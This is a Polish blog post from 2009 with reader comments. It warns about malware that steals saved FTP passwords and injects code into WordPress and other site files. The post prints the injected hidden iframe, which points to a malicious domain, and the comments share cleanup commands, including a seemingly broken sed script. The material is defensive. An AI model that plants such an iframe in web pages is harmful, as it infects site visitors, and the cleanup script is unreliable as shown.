Pozycjonowanie, programowanie, usability, optymalizacja i semantyka Wszystko to składa się na sukces strony WWW!
Jesteś tutaj: Strona główna » Bezpieczeństwo stron WWW » Uwaga na Wordpressy!
Uwaga na Wordpressy! Dodany: 09-04-2009 @ 12:43:15 | Komentarzy: 31
Od jakiegoś czasu po sieci grasuje wirus, który łączy się z naszymi serwerami (prawdopodobnie dane do FTP pobiera z Total Commandera) i dołacza kod html i php do naszych stron. Zagrożone są wszystkie skrypty. Te autorskie i darmowe tj. Wordpress.
Gdzie?
Złośliwy kod jest dodawany do wszystkich katalogów na serwerze do plików index.php, index.html, main.php. W samym kodzie źródłowym dołącza się na samym początku strony (przed !Doctype), zaraz po body, na końcu strony (po zamykającym tagu html) i przed ostatnim tagiem zamykającym body. Ponadto jeżeli używasz Wordpressa, to złośliwy kod jest dołączany do szablonów w katalogu wp-content/themes/ a nawet do innych plików z configami. U mnie był to np. wp-includes/default-filters.php
Co?
Dołączany jest niewidoczny iframe, który wygląda tak (oraz różne kombinacje):
<iframe src="http://cheapslotplay.cn/in.cgi?income48" width=1 height=1 style="visibility: hidden"></iframe>
Co się dzieje?
Wirus się rozprzestrzenia poprzez wyżej pokazany kod – to raz. Dwa – Google blokuje dostęp do strony przez wyszukiwarkę. Pojawia się komunikat, że „strona może wyrządzić szkody”.
Sprawdź swoje strony, skasuj kody html i zmień hasło do FTP!
Komentarze
Miałem coś takiego u klienta. Hasło wypłynęło raczej przez jego komputer (u siebie mam i firewalla i antywira) a wirusa znajdowałem ja po wejściu na stronę.
@Jurgi - niestety, wygląda na to że problemem nie jest pojedynczy wirus, a mamy do czynienia po prostu z nowym rodzajem ataków.
Na witrynach klientków widziałem już najróżniejsze wersje - od ramek, przez wklejenie żywych linków, aż po pseudoszyfrowane JavaScripty.
Projektant TC już o problemie wie, ponoć szukują aktualizację, żeby szyfrować hasła i loginy do FTP - być może nowa wersja już bangla. Ale zagrożony tak naprawdę jest każdy program do FTP nie szyfrujący plików z hasłami.
Przy okazji - co robić po ataku - otóż nie wystarczy usunąć kod i przeskanować komputer w poszukiwaniu robala - trzeba też zmienić hasło do FTP! Miałem już przypadek, że kod został usunięty, komputer wyczyszczony, a bot po pewnym czasie wrócił i używając tego samego hasła wrzucił ponownie śmieci na stronę.
Potwierdzam to co pisze @Kapsel, po usunięciu wirusa, trzeba jeszcze zmienić hasło do FTP. Miałem podobnego wirusa, tylko, że mi wklejał kod JS.
#!/bin/sh
FINDLINE=$(grep -r "cutlot.cn" * |cut -f1 -d: |grep -v $0)
for i in $FINDLINE;do
sed -i "s###" $i
done
Tu skrypt wyszukujacy dodane linijki. Podziekowania dla spolecznosci forum Ubuntu.pl za pomoc.
http://forum.ubuntu.pl/showthread.php?t=98263
tutaj jest poprawny skrypt.
aby wyszukac pliki zainfekowane:
find -type f -exec grep -q 'cutlot' {} ; -print
Polecam FlashFXP z szyfrowaniem zapamiętanych haseł.
Również ja miałem problemy z podobnym wirusem. Kod doklejał się do każdego index.php, bez względu na zastosowany CMS. Bardzo nieprzyjemne, bo po skasowaniu w parę dni później znów było. Wyleczyłem to dzięki Trojan Removerowi i później zmianie wszystkich haseł.
Wczoraj spotkało mnie to samo. Wirus dokleja swój kod do każdego pliku index.php i index.html. Nie ma znaczenia czy to skrypt czy stateczna strona www.
Szybkie rozwiązanie problemu: kontakt z hostingiem, poprosić o logi do ftp, sprawdzić kiedy akcja się zaczęła i poprosić o odtworzenie konta z backupu z dnia wcześniejszego. Wcześniej oczywiście trzeba usunąć paskudztwo z komputera i zmienić hasło do ftp.
Co to jest wirus? :D
@Mac User: duża bakteria :D:D
@DJ SEBSON: Raczej mała bakteria (a w zasadzie to nie bakteria tylko wirus) :D:D
@Kapsel
>Projektant TC już o problemie wie, ponoć szukują aktualizację, żeby szyfrować hasła i loginy
Zaraz zaraz, chcesz powiedzieć, że TC do tej pory przechowuje hasła jako plaintext? Hm, dobrze, że po krótkim kontakcie z tym programem zrezygnowałem z niego. ;)
a ja tego wirusa podam do sądu!
Słyszałem o tym "chadziajestwie wrednym" wiele osób złapało. Przejrzałem część swoich stron i nie ma na szczęście ramek. Zmieniłem nawet TC na Filezilla, chociaż to nie jest pewne, że wykrada hasła z TC.
Z FileZilli też wykrada...
ale jednak TC jest najpopularniejszy, więc ryzyko chyba największe, zależy w jaki sposób wykrada hasała.
Ja polecam FlashFXP, mimo iż nie jest darmowy. Na pewno bardziej przyjazny w użyciu niż FileZilla. Jeśli zaś chodzi o szablony do WP to polecam pobierać je z oficjalnych stron ich autorów, gdyż w serwisach będących zbiorami takich szablonów można wielokrotnie nadziać się na "modyfikowane" szablony z różnymi "niespodziankami".
a co myslicie na laczenie sie poprzez WINSCP?
Zamiast TC oczywiscie.
Jednego z moich userów to też dopadło. Co do SCP to oczywiście jest znacznie lepszy niż FTP (zwłaszcza przy autoryzacji kluczami), ale i tak podstawowa zasada bezpieczeństwa to nigdy nie przechowywać zapamiętanych haseł w żadnym programie! Hasło jest od tego, żeby znajdowało się tylko w głowie i żeby za każdym razem trzeba było je "z palca" wpisywać przy połączeniu. Inaczej użycie haseł traci w ogóle sens.
Hej, wydaje mi się, że to nie jest Total Commander, prawdopodobnie wirus wykorzystuje katalog TMP - więcej pod tym adresem http://www.mojito-networks.com/blog/index.php/2009/04/26/wirus-iframe-total-commander/
Pojawila sie chyba kolejna mutacja - zmiania index.php i dodaje juz pokodowane linki :)
Potyczki na Wordpressem i pozostawionym hasłem
http://nomadowyblog.pl/2009/05/wirusowy-wordpress-2/
U mnie to samo sie stalo.. na winylowe.com. O dziwo - korzystam z Maca, Leopard. TYLKO i wyłącznie.
Wirus wykrada cały plik z zapisanymi danymi do strony, zaszyfrowanie hasła pomoże jedynie w dodaniu go do robota doklejającego kod, ponieważ ręcznie da się wejść na FTP, jedyna szansa to zaszyfrować cały plik unikalnym kluczem który można otworzyć tylko na tym jednym komputerze.
Zmieniłem hasło, zainstalowałem TCMD, wgrałem ponownie wszystkie pliki, wirus wraca... Ma ktoś jakiś pomysł?
Wirus wykrada hasła także za pośrednictwem FlashFXP, co mnie bardzo dziwi. Niestety i mnie to spotkało, choć używam tylko tego jednego klienta FTP.
Ja miałem 43 robaki na swojej stronie. I wszystkie zniszczyłem. Jak narazie żaden nie powrócił. Napisałem krótki poradnik jak się ich pozbyć - http://www.kaluza.boo.pl/?p=5
Problem jest tylko taki, o czym prawie nikt nie wspomina, ze np. Kaspersky absolutnie nie wykrywa tego wirusa i moze on sobie buszowac po kompie w dowolny sposob... o czym sie wlasnie bolesnie przekonalem.
Druga sprawa - niestety nie wystarczy samo wyciecie wrednego kodu ze strony (bo tam nie ma zadnego wirusa tylko kod - glownie generujacy ruch na stronach np xxx pewnie w celach reklamowych) - trzeba poprawic caly plik bo wirus wklejajac zlosliwy iframe niestety dokonuje ciec w kodzie strony (pewnie wynika to z bledu w wirusie bo jest to dzialanie calkiem bezsensowne z punktu widzenia dzialania kodu - uniemozliwia czesto dzialanie strony)
Ja mam już najnowszego TC i na szczęście hasła są szyfrowane... zresztą i tak wolę korzystać z ftp przez Mozille bo jest 10 razy bezpieczniejsza bardziej komfortowa i ma praktycznie same zalety... ;)
Nie wiem czemu ludzie tworzą te wirusy. To jest takie bezinteresowne szkodzenie innym z pogranicza megalomani. Siedzą potem tacy w swoich jamach i podniecają się czyj wirus więcej naszkodził . Żal
O podkradaniu haseł do ftp z Totla Commandera już słyszałem.
Jedno pytanie: czy adres w tym kodzie jest stały? Można by go dodać do filtra. I: jak bardzo jest to zaraźliwe, infekuje tylko IE, czy coś jeszcze?